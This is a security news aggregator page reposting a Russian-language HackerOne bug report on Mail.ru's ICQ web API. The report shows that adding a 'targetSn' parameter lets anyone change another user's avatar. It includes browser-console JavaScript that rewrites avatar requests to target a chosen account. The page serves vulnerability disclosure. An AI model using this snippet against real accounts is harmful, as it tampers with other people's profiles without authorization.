1. Reverse Engineering >
  2. Exploits >
  3. Mail.ru: [API] ICQ user's avatar can be manipulated remotely

ArabicEnglishFrenchGermanGreekItalianJapaneseKoreanPersianPolishPortugueseRussianSpanishTurkishVietnamese

Mail.ru: [API] ICQ user's avatar can be manipulated remotely


Exploits vom | Direktlink: vulners.com Nachrichten Bewertung


image
Description: При обращении к API методу установки аватара пользователя (https://ub.icq.net/files/api/v1.1/avatar/set) Можно передать дополнительный GET параметр: targetSn - с установленным UIN'ом любого пользователя Тем самым можем изменить аватарку у любого пользователя Steps To Reproduce: Открыть Web версию ICQ Вставляем в консоль браузера следующий код (Указав вместо UIN атакуемый аккаунт): ``` const XHR_OPEN = XMLHttpRequest.prototype.open; XMLHttpRequest.prototype.open = function (...args) { let url = new URL(args[1]) if (url.pathname === '/files/api/v1.1/avatar/set') { url.searchParams.set('targetSn', 'UIN') args[1] = url.toString() console.log(args[1]) } return XHR_OPEN.apply(this, args); } ``` 1. Заменить аватар пользователя Скринкаст: █████████ Impact Частичный доступ к управлению чужими аккаунтами (возможно уязвимость применима и к другим методам......

Externe Webseite mit kompletten Inhalt öffnen

https://vulners.com/hackerone/H1:786745?utm_source=rss&utm_medium=rss&utm_campaign=rss

Team Security Social Media

➤ Weitere Beiträge von Team Security | IT Sicherheit

Team Security Diskussion über Mail.ru: [API] ICQ user's avatar can be manipulated remotely